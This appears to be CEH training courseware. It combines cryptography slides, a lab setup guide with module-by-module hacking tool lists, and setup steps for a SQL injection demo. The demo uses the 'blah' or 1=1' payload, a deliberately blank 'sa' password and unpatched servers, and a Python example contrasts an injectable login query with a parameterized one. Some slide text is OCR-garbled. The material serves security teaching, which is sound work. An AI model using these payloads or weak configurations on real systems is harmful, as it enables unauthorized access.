• Countermeasures include checking the code, disabling stack execution, safer C library support, and safer compiler techniques.

• Tools like StackGuard, Immunix and vulnerability scanners help in securing systems.
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Ethical Hacking

Module XXI
Cryptography

Module Objective

• What is PKI
• RSA
• MD5
• SHA
• SSL
• PGP
• SSH
• Encryption cracking techniques
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Public-key Cryptography

• Public-key cryptography was invented in 1976 by Whitfield Diffie and Martin Hellman.

• In this system, each person gets a pair of keys, called the public key and the private key.

• Each person's public key is published while the private key is kept secret.

• Anyone can send a confidential message using only public information, but it can only be decrypted with the private key that is in the sole possession of the intended recipient. The security of the scheme therefore rests on two things: the private key never leaving its owner, and the sender having an authentic copy of the recipient's public key (the problem PKI exists to solve).
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Worki ng of E ncrypti on 
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Digital Signature (diagram)

Signing, on the sender's side:
  Document -> Hash Algorithm -> message digest
  message digest -> Private Key Encryption (sender's private key) -> Digital Signature
  Signed Document = Document + Digital Signature

Verification, on the recipient's side:
  Signed Document -> separate the Digital Signature -> Public Key Decryption (sender's public key) -> original digest
  Original Document -> Hash Algorithm -> recomputed digest
  The signature is valid only if the two digests match.
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RSA (Rivest Shamir Adleman)

• RSA is a public-key cryptosystem developed by MIT professors Ronald L. Rivest, Adi Shamir and Leonard M. Adleman in 1977.

• RSA uses modular arithmetic and elementary number theory to do computation using two very large prime numbers.

• RSA encryption is widely used and is the 'de facto' public-key encryption standard.
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Example of RSA algorithm

  P  = 61    <- first prime number (destroy this after computing E and D)
  Q  = 53    <- second prime number (destroy this after computing E and D)
  PQ = 3233  <- modulus (give this to others)
  E  = 17    <- public exponent (give this to others)
  D  = 2753  <- private exponent (keep this secret!)

  Your public key is (E, PQ).
  Your private key is D.

  The encryption function is:
    encrypt(T) = (T^E) mod PQ
               = (T^17) mod 3233

  The decryption function is:
    decrypt(C) = (C^D) mod PQ
               = (C^2753) mod 3233

  To encrypt the plaintext value 123, do this:
    encrypt(123) = (123^17) mod 3233
                 = 337587917446653715596592958817679803 mod 3233
                 = 855

  To decrypt the ciphertext value 855, do this:
    decrypt(855) = (855^2753) mod 3233
                 = 123
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RSA Attacks

• Brute-force factoring of the modulus

• Esoteric attacks

• Chosen-ciphertext attack

• Low encryption exponent attack

• Error analysis (fault attacks)

• Other attacks

MD5

• The MD5 algorithm takes as input a message of arbitrary length and produces as output a 128-bit "fingerprint" or "message digest" of the input.

• The MD5 algorithm is intended for digital signature applications, where a large file must be "compressed" in a secure manner before being encrypted with a private (secret) key under a public-key cryptosystem such as RSA. Since 2004 practical collisions for MD5 have been published, so it should no longer be used where collision resistance matters, signatures included.
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SHA (Secure Hash Algorithm)

• The SHA algorithm takes as input a message of arbitrary length and produces as output a 160-bit "fingerprint" or "message digest" of the input.

• The algorithm is slightly slower than MD5, but the larger message digest makes it more secure against brute-force collision and inversion attacks: a generic collision search costs about 2^80 operations for a 160-bit digest against 2^64 for a 128-bit one. (The 160-bit SHA-1 described here has itself since been broken by a practical collision; the SHA-2 family replaces it.)
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SSL (Secure Socket Layer)

• SSL stands for Secure Sockets Layer. SSL is a protocol developed by Netscape for transmitting private documents via the Internet.

• SSL works by using public-key cryptography to authenticate the server (via its certificate) and to agree a session key, and then a symmetric cipher under that session key to encrypt the data transferred over the SSL connection.

• The SSL protocol is application-protocol independent.

RC5

• RC5 is a fast block cipher designed by RSA Security in 1994.

• It is a parameterized algorithm with a variable block size, a variable key size and a variable number of rounds. The nominal parameters are a 64-bit block, 12 rounds and a 128-bit key (RC5-32/12/16).

• RC6 is a block cipher based on RC5. Like RC5, RC6 is a parameterized algorithm where the block size, the key size and the number of rounds are variable. The upper limit on the key size is 2040 bits.
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What is SSH?

• The program SSH (Secure Shell) is a secure replacement for telnet and the Berkeley r-utilities (rlogin, rsh, rcp and rdist).

• It provides an encrypted channel for logging into another computer over a network, executing commands on a remote computer, and moving files from one computer to another.

• SSH provides strong host-to-host and user authentication as well as secure encrypted communications over an insecure internet.

• SSH 2 is a more secure, efficient and portable version of SSH that includes SFTP, a file transfer protocol that runs over an SSH 2 channel (it is a separate protocol, not FTP tunnelled through SSH).
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Government Access to Keys (GAK)

• Government Access to Keys (also known as key escrow) means that software companies will give copies of all keys (or at least enough of each key that the remainder could be cracked very easily) to the government.

• The government promises that it would hold the keys in a secure way and only use them to decrypt traffic when a court issues a warrant to do so.

• To the government this issue is similar to the ability to wiretap phones.
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RSA Challenge

  Challenge Number   Prize (US$)   Status         Submission Date   Submitter(s)
  RSA-576            $10,000       Not Factored
  RSA-640            $20,000       Not Factored
  RSA-704            $30,000       Not Factored
  RSA-768            $50,000       Not Factored
  RSA-896            $75,000       Not Factored
  RSA-1024           $100,000      Not Factored
  RSA-1536           $150,000      Not Factored
  RSA-2048           $200,000      Not Factored

• The RSA Factoring Challenge is an effort, sponsored by RSA Laboratories, to learn about the actual difficulty of factoring large numbers of the type used in RSA keys.

• A set of eight challenge numbers, ranging in size from 576 bits to 2048 bits, is given. (The table reflects the status when these slides were written; RSA-576 was factored in December 2003, RSA-640 in 2005 and RSA-768 in 2009, which is why 1024-bit RSA keys are now considered too short.)

www.distributed.net

• An attempt to crack RC5 encryption using a network of computers worldwide.

• The client utility, when downloaded from distributed.net, runs the cracking algorithm as a screensaver and sends results to the distributed.net servers.

• The challenge is still running...
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PGP (Pretty Good Privacy)

• Pretty Good Privacy (PGP) is a software package originally developed by Philip R. Zimmermann that provides cryptographic routines for e-mail and file storage applications.

• Zimmermann took existing cryptosystems and cryptographic protocols and developed a program that can run on multiple platforms. It provides message encryption, digital signatures, data compression and e-mail compatibility.

Hacking Tool: PGP Crack
http://munitionsjgluxjb.neiydolphin.cgi?ad:ion=render& 
category=0406 

0 PGP crack is a program designed to brute-force a 
conventionally encrypted file with PGP or a PGP secret 
key. 

© Thefile"pgpfile" must not be ascii-armored. The file 
"phrase! i St" should be a file containing all of the 
passph rases that wi 1 1 be used to attempt to crack the 
encrypted file. 
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Summary

• Using a Public Key Infrastructure (PKI), anyone can send a confidential message using public information, which can only be decrypted with a private key in the sole possession of the intended recipient.

• RSA encryption is widely used and is a 'de facto' encryption standard.

• The MD5 algorithm is intended for digital signature applications, where a large file must be compressed securely before being encrypted.

• The SHA algorithm takes as input a message of arbitrary length and produces as output a 160-bit message digest of the input.

• Secure Sockets Layer (SSL) is a protocol for transmitting private documents via the Internet.

• RC5 is a fast block cipher designed by RSA Security.

• SSH (Secure Shell) is a secure replacement for telnet and the Berkeley r-utilities; it provides an encrypted channel for logging into another computer over a network, executing commands on a remote computer, and moving files from one computer to another.
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CEH LAB SETUP v3

Document overview

This document provides background information for technical staff responsible for setting up a training room facility for the CEH course. This guide describes the requirements for the network equipment and computer stations that are installed and configured by the facilities personnel for the training courses.

Training room environment

The training room environment consists primarily of the following equipment (numbers are for a class of 12 students):

  Student Workstations (12): Windows 2000 Server w/o SP. Minimum: Pentium-based PC with 4 GB free disk space, 128 MB RAM, 1 NIC (disable or unplug extras), 15-inch monitor and cards to drive at 800 x 600 (or at the monitor's native resolution) configured at 256 colors, and a compatible mouse.

  Instructor Station (1): Windows 2000 Server w/o SP. Minimum: Pentium-based PC with 10 GB free disk space, 128 MB RAM, 1 NIC (disable or unplug extras), 15-inch monitor and cards to drive at 800 x 600 (or at the monitor's native resolution) configured at 256 colors, a compatible mouse, and a wireless card.
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
  Instructor Station (1): RedHat Linux 8 or 9. Minimum: Pentium-based PC with 10 GB free disk space, 128 MB RAM, 1 NIC (disable or unplug extras), 15-inch monitor and cards to drive at 800 x 600 (or at the monitor's native resolution) configured at 256 colors, and a compatible mouse.

  Victim Machine (1): Windows 2000 Server w/o SP. Minimum: Pentium-based PC with 10 GB free disk space, 128 MB RAM, 1 NIC (disable or unplug extras), 15-inch monitor and cards to drive at 800 x 600 (or at the monitor's native resolution) configured at 256 colors, and a compatible mouse.



Instructor's computer 

The instructor's computer must; 

■ Be installed with Windows 2000 Professional w/o SP 

■ Be installed with SQL Server 2000 w/o SP 

■ Be running Microsoft Internet Information Server (IIS) 

■ Be running IP protocol. IPX is required if demonstrating NetWare hacking (optional) 

■ Contain all hacking tools from the CD-ROM resident on the hard drive in c:\tools 

■ Contain all Windows 2000 source files in c:\i386 
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■ Have PowerPoint, Word and Excel installed 

■ Have Adobe Acrobat, WinZip installed 

■ Install VMWare (Download evaluation registration key from VMWare website) 

■ Have an Overhead Projector connected 

■ Have a CD-ROM as part of its hardware 

■ Set Windows Explorer to show all files and file types and extensions. 

■ The use of Ghost images is recommended to reduce setup time if computer failure occurs. If using Ghost, the 
Instructor's computer should have an 8 GB hard drive that consists of a 4 GB FAT partition for NT and at least one 
other partition on which to store images of the computers. 

If using NetWare. 1 pc should also be running (optional); 

■ Client 32 version 4.7+ 

■ NWAdmin 

■ RConsole 

■ NetWare administrator user ID = administrator, no password 

Student workstations 

Student workstations must; 

■ Be installed with Windows 2000 Professional w/o SP 

■ Be installed with IIS 

■ Be running IP (IPX and NetBIOS compatible protocols required if using NetWare - optional) 

■ Contain all hacking tools from the CD-ROM resident on the hard drive in c:\tools 

■ Contain all Windows 2000 source files in c:\i386 

■ Set Windows Explorer to show all files and file types. 

■ Have Adobe Acrobat, WinZip installed 

■ Install VMWare (Download evaluation registration key from VMWare website) 

■ Install Matrix screen saver located in hacking CD-ROM\Miscellaneous directory - set the time to 15 mins. 

■ Download the CEH desktop wallpaper from http://www.eccouncil.org/classroom/background.jpg and set the downloaded image as the Windows background wallpaper.
Victim workstation

The victim workstation must:

■ Be installed with Windows 2000 Professional w/o SP

■ Be installed with SQL Server 2000 w/o SP

■ Be installed with IIS

■ Be running IP (IPX and NetBIOS compatible protocols required if using NetWare)

■ Contain all hacking tools from the CD-ROM resident on the hard drive in c:\tools 

■ Contain all Windows 2000 source files in c:\i386 

■ Set Windows Explorer to show all files and file types. 



Room environment 

■ The room must contain a whiteboard measuring a minimum of 1 yard by 2-3 yards in length (1 1/2 meters by 2-3 meters).

■ The room should contain an easel and large tablet. 

■ The room must be equipped with legible black and blue felt tip pens (CHISEL-Point, not fine-tip). 



Classroom configuration 

The configuration of this classroom is modular. Computers can be added or removed by either row or column, depending on the needs of the particular class. The following is a sample room setup that provides optimal support. This setup allows the instructor easy access to trouble spots, and allows students to break into functional small and larger teams.
[Classroom setup diagram; the recoverable labels are:]

Victim Machine: Windows 2000 Server w/o SP, Microsoft SQL Server, IIS 5.0

Instructor Machines: Windows 2000 Server with Microsoft SQL Server, and Red Hat Linux; wireless LAN card

Wireless Access Point (needed for the Wireless Hacking module)

Internet Access

Hub or Switch

Students' Machines: Windows 2000 Server w/o SP. Boot the students' PCs using the CD-ROM bootable Linux for labs that use Linux tools such as nmap/hping2/dsniff/arpspoof/dnsspoof.
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Set up the machines based on the classroom setup diagram. The lab exercises for the students are instructor led and they 
are based on the hacking tools in the trainer slides. The instructor is encouraged to demonstrate and guide the students on 
the usage of the hacking tools against the Victim's computer. Do not encourage live hacking on the Internet using these 
tools in the classroom. Please feel free to include your own exercises. 

Instructor PC Requirements

Machine 1

Windows 2000 Server w/ SP0 or SP1
Microsoft SQL Server 2000
Optional: Wireless LAN Card
Optional: Wireless Access Points

Machine 2

RedHat Linux 7 or 8

Victim Machine Requirements

Windows 2000 Server (No service pack) default installation

Student Machine Requirements

Machine 1: Windows 2000 Server w/ SP0 or SP1

Machine 2: Optional: Machine with CD-ROM bootable Linux
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Network topology 

The training room network must be physically isolated from any production network; students must still be able to reach the Internet from their PCs. All computers are connected as one isolated network and domain. The common protocol is IP. All computers should receive dynamic IP addresses from a DHCP server; this reduces problems when booting from the Linux bootable CD-ROM. NICs can be 10 Mbit or 100 Mbit (100 Mbit is recommended). A hub is recommended instead of a switch: a hub repeats every frame to every port, so passive sniffers see all classroom traffic during the Sniffer module, whereas on a switch each port receives only its own unicast traffic plus broadcasts, and the ARP-poisoning tools on the Linux CD-ROM (arpspoof, Ettercap) have to be used to redirect traffic through the sniffing host. Cables must be bundled and tied out of pathways and work areas, and be of sufficient length so as not to be under stress.

Instructor acceptance 

Before the training class is scheduled to begin, the instructor will visit the training facility to inspect and accept the setup. 
The technical contact (System Administrator) for the facility must be available to answer questions and correct any setup 
issues. Both the instructor and the facility technical contact will ensure completion of the following checklists before the 
training setup is deemed acceptable. 



Checklists

Check the following on all PCs (tick each item):

□ Open Network Neighborhood. Verify that all classroom computers are visible in Network Neighborhood.

□ Verify that the Windows OS source files are on the computer in c:\i386.

□ Verify that the hacking tools are on the computer in c:\tools.

□ Verify that Internet access is available.

□ Visit http://www.eccouncil.org and view the page to check Internet access.

□ Open Command Prompt and type ping eccouncil.org and look for replies from the server (ICMP echo can be filtered upstream even when web access works, so treat the browser check as the authoritative one).

□ Verify Microsoft PowerPoint, Word, Excel are installed.

□ Verify Acrobat and WinZip are installed.

□ Verify that the Instructor computer can image through the overhead projector.

□ Verify each computer has 2 GB or more free disk space.

□ Verify Windows Explorer is set to show all files and file types, including hidden files and extensions.

□ Verify that you can successfully boot using the CD-ROM bootable EC-Council Linux CD-ROM.

□ Cable wiring organized and labeled.

□ Student workstations and chair placement satisfactory.

□ Placement of LCD (overhead) projector appropriate.

□ Whiteboard, dry erase markers and eraser are available.

□ Instructor station properly organized and oriented.

□ Computers are labeled with client number.

□ EC-Council courseware available for students.

□ Write down the facility's technical contact person's mobile phone number. Contact him in case of network problems.

□ Verify the configuration of the CEH wallpaper on the desktop: black background with the CEH logo at the center.

□ Test the "Matrix" screen saver.
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Training Duration and Breakdown 

Recommended duration for CEH training: 5 days (9:00 - 5:00)
Topics Breakdown: 

Day 1 

Ethics and Legal Issues 
Footprinting 
Scanning 
Enumeration 

Day 2 

System Hacking 
Trojans and Backdoors 

Day 3 

Sniffers 

Denial of Service 
Social Engineering 
Session Hijacking 

Day 4 

Hacking Web Servers 

Web Application Vulnerabilities 

Web Based Password Cracking Techniques 

SQL Injection 

Hacking Wireless Networks 
Day 5 

Virus and Worms 

Hacking Novell (Optional Module) 

Hacking Linux 

IDS, Firewalls and Honeypots, Buffer Overflows 
Cryptography 
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Lab Exercises 

Practice and understand how these tools work by reading the 
documentation accompanying the tool. 

Conduct the following module exercises in the classroom. 



Install Command Prompt Here tool. 

This shell extension adds a CMD Prompt Here command to the 
context menu that is available when you right-click in the Folders 
(left) pane of Windows Explorer. Selecting this option from the 
context menu creates a new command-prompt session with the 
same path as that of the object that is right-clicked. 

Installing CmdHere 

To install CmdHere: 

1. In Windows Explorer, navigate to <CD-ROM>\Miscellaneous

2. Right-click DOSHERE.INF.

3. On the resulting pop-up menu, click Install.
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Now you can open any directory in command prompt. For example 
to open < CD-ROM >\System Hacking\ directory in Command 
prompt, simply right-click the System Hacking directory and select 
Command Prompt Here 
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Module 1: Legality 

■ Ask the student to read the "Ethical Hacking Agreement.doc" 

Module 2: Footprinting 

■ Whois (Linux CD-ROM) 

■ http://tucows.com

■ Hacking Tool: Sam Spade

■ NSLookup 

■ ARIN 

■ Traceroute 
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■ Hacking Tool: NeoTrace 

■ Visual Route 

■ Visual Lookout 

■ Hacking Tool: Smart Whois 

■ Hacking Tool: eMailTracking Pro 

■ Hacking Tool: MailTracking.com 

Module 3: Scanning 

■ Hacking Tool: Netscan Tools Pro 2000 

■ Hacking Tool: Hping2 (Linux CD-ROM) 

■ Hacking Tool: netcraft.com 

■ Hacking Tool: nmap (Linux CD-ROM) 

■ Hacking Tool: HTTrack Web Copier 

■ SolarWinds Toolset 

■ NeoWatch 

■ Hacking Tool: Cheops (Linux CD-ROM) 

Module 4: Enumeration 

■ NetBIOS Enumeration 

■ Hacking Tool: DumpSec 

■ Hacking Tool: NAT 

■ Hacking Tool: User2SID 

■ Hacking Tool: SID2User 

■ Hacking Tool: Enum 

■ Hacking Tool: UserInfo

■ Hacking Tool: GetAcct 



Module 5: System Hacking 

■ Legion 

■ VisualLast 

■ Hacking Tool: L0phtCrack



■ Hacking Tool: GetAdmin 

■ Hacking Tool: Rootkit 

■ MD5 Checksum utility 

■ Auditpol 

■ Hacking Tool: Elslave 

■ Hacking Tool: Winzapper 

■ Hacking Tool: Evidence Eliminator 

■ NTFS File Streaming 

■ Hacking Tool: Snow 

■ Hacking Tool: Camera/Shy 



Module 6: Trojans and Backdoors 

■ Hacking Tool: Tini 

■ Hacking Tool: Netcat 

■ Hacking Tool: NetBus 

■ Packaging Tool: Microsoft WordPad 

■ Hacking Tool: Whack a Mole 

■ fPort 

■ TCPView 

■ Process Viewer 



Module 7: Sniffers 

■ Hacking Tool: Ethereal (Linux CD-ROM) 

■ Hacking Tool: Ettercap (Linux CD-ROM) 

■ Hacking Tool: EtherPeek 

■ Hacking Tool: ArpSpoof (Linux CD-ROM) 

■ Hacking Tool: DSniff (Linux CD-ROM) 

■ Hacking Tool: Macof (Linux CD-ROM) 

■ Hacking Tool: mailsnarf (Linux CD-ROM) 
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■ Hacking Tool: URLsnarf (Linux CD-ROM) 

■ Hacking Tool: Webspy (Linux CD-ROM) 

■ Hacking Tool: WebMiTM (Linux CD-ROM) 

■ Hacking Tool: Cain and Abel 

■ Hacking Tool: Packet Crafter 

■ Hacking Tool: WinSniffer 



Module 8: Denial of Service

■ Hacking Tool: Ping of Death

■ Hacking Tool: Freak88

Module 9: Social Engineering 

■ Ask the student to read "Social Engineering-story.pdf"

■ Play the Kevin Mitnick Video 

■ Demonstrate Hotmail Social Engineering 



Module 10: Session Hijacking 

■ Hacking Tool: T-Sight 

■ Remote TCP Session Reset Utility 



Module 11: Hacking Web Servers 

■ Hacking Tool: Jill32 

■ Hacking Tool: IIS5-Koei

■ Hacking Tool: IIS5Hack

■ Network Tool: LogAnalyzer 

■ Hacking Tool: IISExploit 



■ Hacking Tool: WB 

■ UpdateExpert 

■ cacls utility

■ Network Tool: Whisker 

■ N-Stealth Scanner 

■ Hacking Tool: WebInspect

■ Network Tool: Shadow Security Scanner 



Module 12: Web Application Vulnerabilities 

■ Using Google to Inspect Applications 

■ Hacking Tool: Instant Source 

■ Hacking Tool: Jad 

■ Hacking Tool: Lynx 

■ Hacking Tool: Wget 

■ Hacking Tool: Black Widow 

■ Hacking Tool: WebSleuth 



Module 13: Web Based Password Cracking 
Techniques 

■ Hacking Tool: WebCracker

■ Hacking Tool: Brutus 

■ Hacking Tool: ObiWan 

■ Hacking Tool: Munga Bunga 

■ Hacking Tool: Varient 

■ Hacking Tool: PassList 

■ Hacking Tool: CookieSpy

■ Hacking Tool: SnadBoy 
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Module 14: SQL Injection (See How to setup the SQL 
Demo scripts) 

■ blah' or 1=1 

■ Hacking Tool: SQLDict 

■ Hacking Tool: SQLExec 

■ Hacking Tool: SQLbf 

■ Hacking Tool: SQLSmack 

■ Hacking Tool: SQL2.exe 

Module 15: Hacking Wireless Networks 

■ Hacking Tool: NetStumbler

■ Hacking Tool: AirSnort 

■ Hacking Tool: AiroPeek 

■ Hacking Tool: WEP Cracker 

■ Hacking Tool: Kismet 

■ WIDZ- Wireless IDS 

Module 16: Virus and Worms 

■ How to write your own Virus? 

Module 17: Novell Hacking 

■ Novell Hacking is Optional 

Module 18: Linux Hacking 

■ HPing2 as Trojan 

■ Hunt 

■ Nessus 

■ Advanced Nmap 



■ Linux Rootkits 

■ IPChains and IPTables 



Module 19: IDS, Firewalls and Honeypots 

■ SNORT 

■ Hacking Tool: fragrouter 

■ Hacking Tool: TCPReplay 

■ Hacking Tool: SideStep 

■ Hacking Tool: NIDSbench 

■ Hacking Tool: ADMutate 

■ Honeypot Trapserver 

Module 20: Buffer Overflows 

■ Writing your own Buffer Overflow Exploit in C 

■ StackGuard 

■ Immunix 



Module 21: Cryptography 

■ PGP 

■ SSH 

■ Encryption Cracking Techniques 
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How to setup the SQL Demo Scripts for SQL 
Injection Module



1. The SQL Demo scripts are located in the directory <CD-ROM>\Module 14 - SQL Injection\SQL demo scripts

2. Make sure SQL Server 2000 is installed.

3. The default user account/password for SQL Server should be sa with no password. This, like the missing service packs, is a deliberately weak lab configuration: it is what the injection demo exploits, so it must exist only on the isolated classroom network.

4. Create the Juggybank database. Execute the juggybank.sql script located in the <data> directory using SQL Query Analyzer.

5. Set up a System DSN in Control Panel and name it juggybank. The login.asp page refers to this DSN for accessing the database.

6. Populate the Userinfo table with data from the juggybank-userinfo-data.txt file, manually or using the bcp import utility.

7. Populate the CreditCard table with data from the juggybank-creditcard-data.txt file.

8. Set SQL Server to Mixed Mode authentication using SQL Server Enterprise Manager.

9. Publish <CD-ROM>\Module 14 - SQL Injection\SQL demo scripts in IIS as a virtual directory called SQLInjection.

10. Ensure the IUSR_COMPUTERNAME account has read access to all the files in this virtual directory.

11. Configure the SQLInjection virtual directory for directory browsing in IIS.

12. Test the scripts by opening the following in Internet Explorer:

o http://localhost/sqlinjection/index.htm
o http://localhost/sqlinjection/client.htm

■ Log in as username joker with password joker

-or-

■ Log in as blah' or 1=1

■ You should see the bank's Account Summary page

o http://localhost/sqlinjection/client2.htm

■ This page has larger login input fields. You can try advanced SQL injection techniques from this page, such as resetting IIS.

o If you don't see the bank page, it is most likely a permission problem. Check your settings again.
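What the blah' or 1=1 login in the Module 14 exercise list and in step 12 above actually exercises, as an added example that is not part of the original courseware or of the juggybank demo scripts. The page does not reproduce login.asp, so the query below is an assumed reconstruction of the usual two-field string-concatenated login query; the Userinfo rows are constructed, SQLite stands in for SQL Server 2000, and the names make_db, login_vulnerable and login_fixed are this example's own. Because the reconstructed query closes both quoted values, a bare blah' or 1=1 would leave an unclosed quote, so the example uses the comment-terminated form blah' or 1=1-- in the username and the ' or '1'='1 form in the password, which are the same idea with the trailing quote neutralized. The parameterized version beside it is the fix.

```python
import sqlite3

# Constructed sample rows standing in for the demo's Userinfo table
# (the real demo loads it from juggybank-userinfo-data.txt).
SAMPLE_USERS = [("joker", "joker"), ("alice", "s3cret")]


def make_db():
    """Create an in-memory Userinfo table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Userinfo (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO Userinfo VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Assumed reconstruction of the login.asp pattern: the form fields are
    pasted straight into the SQL text. Returns the usernames the query
    matched; a non-empty list is what the page treats as 'logged in'."""
    sql = ("SELECT username FROM Userinfo "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return [row[0] for row in conn.execute(sql).fetchall()]


def login_fixed(conn, username, password):
    """Same check with bound parameters: the driver sends the values apart
    from the SQL text, so quotes and comment markers in the input are data,
    never syntax."""
    sql = "SELECT username FROM Userinfo WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password)).fetchall()]


if __name__ == "__main__":
    db = make_db()
    print("joker/joker        :", login_vulnerable(db, "joker", "joker"))
    # Username injection: the -- comments out the rest of the WHERE clause,
    # leaving  username = 'blah' or 1=1  which is true for every row.
    print("blah' or 1=1--     :", login_vulnerable(db, "blah' or 1=1--", "x"))
    # Password injection: AND binds tighter than OR, so the clause becomes
    # (username='blah' AND password='') OR '1'='1', again true for every row.
    print("' or '1'='1 (pwd)  :", login_vulnerable(db, "blah", "' or '1'='1"))
    # The parameterized query treats the same strings as literal credentials.
    print("fixed, injected    :", login_fixed(db, "blah' or 1=1--", "x"))
```

Run it on the instructor's Linux machine (or any host with Python) before class: the two injected calls to login_vulnerable return every user in the table, which is the same effect the Account Summary page shows, while login_fixed returns nothing for them. The same `--` comment terminator works on SQL Server 2000, which is why the client2.htm page with its longer input fields is where the more elaborate payloads go.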



Assistance:

If you have problems or require assistance in setting up the lab for your CEH class, please e-mail support@eccouncil.org
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